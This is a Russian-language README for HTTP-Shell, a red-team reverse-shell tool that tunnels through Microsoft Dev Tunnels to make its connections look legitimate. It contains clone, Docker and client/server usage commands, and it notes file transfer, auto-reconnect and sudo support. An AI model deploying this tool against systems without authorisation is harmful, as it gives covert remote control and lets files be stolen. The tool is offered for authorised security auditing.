
Многоплатформенная обратная оболочка HTTP, предоставляющая интерфейс, похожий на оболочку, по протоколу HTTP, с возможностью загрузки и скачивания файлов, историей команд, автоматическим переподключением и поддержкой sudo, предназначенная для использования с Microsoft Dev Tunnels.

HTTP-Shell — это мультиплатформенная обратная оболочка. Данный инструмент помогает получить интерфейс командной строки при обратном соединении через HTTP. В отличие от других обратных оболочек, основная цель инструмента — использование в связке с Microsoft Dev Tunnels для максимально легитимного соединения.
Эта оболочка не является полностью интерактивной, но отображает любые ошибки на экране (как в Windows, так и в Linux), позволяет загружать и скачивать файлы, имеет историю команд, очистку терминала (даже с помощью CTRL+L), автоматическое переподключение, перемещение между директориями и поддерживает sudo (или sudo su) в ОС на базе Linux.
Рекомендуется клонировать полный репозиторий или скачать zip-файл. Это можно сделать, выполнив следующую команду:
git clone https://github.com/JoelGMSec/HTTP-Shell
# Сервер
_ _ _____ _____ ____ ____ _ _ _
| | | |_ _|_ _| _ \ / ___|| |__ ___| | |
| |_| | | | | | | |_) |___\___ \| "_ \ / _ \ | |
| _ | | | | | | __/_____|__) | | | | __/ | |
|_| |_| |_| |_| |_| |____/|_| |_|\___|_|_|
---------------- by @JoelGMSec -----------------
[!] Использование: HTTP-Server.py [ПОРТ]
# Linux CLI
[!] Использование: ./HTTP-Client.sh -c [HOST:PORT] -s [ЗАДЕРЖКА] (необязательно)
# Windows CLI
[!] Использование: .\HTTP-Client.ps1 -c [HOST:PORT] -s [ЗАДЕРЖКА] (необязательно)
Если вы хотите запустить сервер в контейнере Docker:
docker build -t http-shell https://github.com/JoelGMSec/HTTP-Shell.git#main
docker run -it --rm -p 8080:8080 --name http-shell http-shell
https://darkbyte.net/obteniendo-shells-con-microsoft-dev-tunnels
Этот проект лицензирован по лицензии GNU 3.0 — подробнее см. файл LICENSE.
Оригинальная идея и часть кода от Héctor de Armas Padrón (@3v4si0n)
Этот инструмент был создан и разработан с нуля Joel Gámez Molina (@JoelGMSec).
Данное программное обеспечение не предоставляет никаких гарантий. Его использование предназначено исключительно для образовательных целей и/или аудита безопасности при соответствующем согласии клиента. Я не несу ответственности за его неправильное использование или любой возможный ущерб, причинённый им.
Для получения дополнительной информации вы можете найти меня в Twitter: @JoelGMSec и в моём блоге darkbyte.net.
Вы можете поддержать мою работу, купив мне кофе: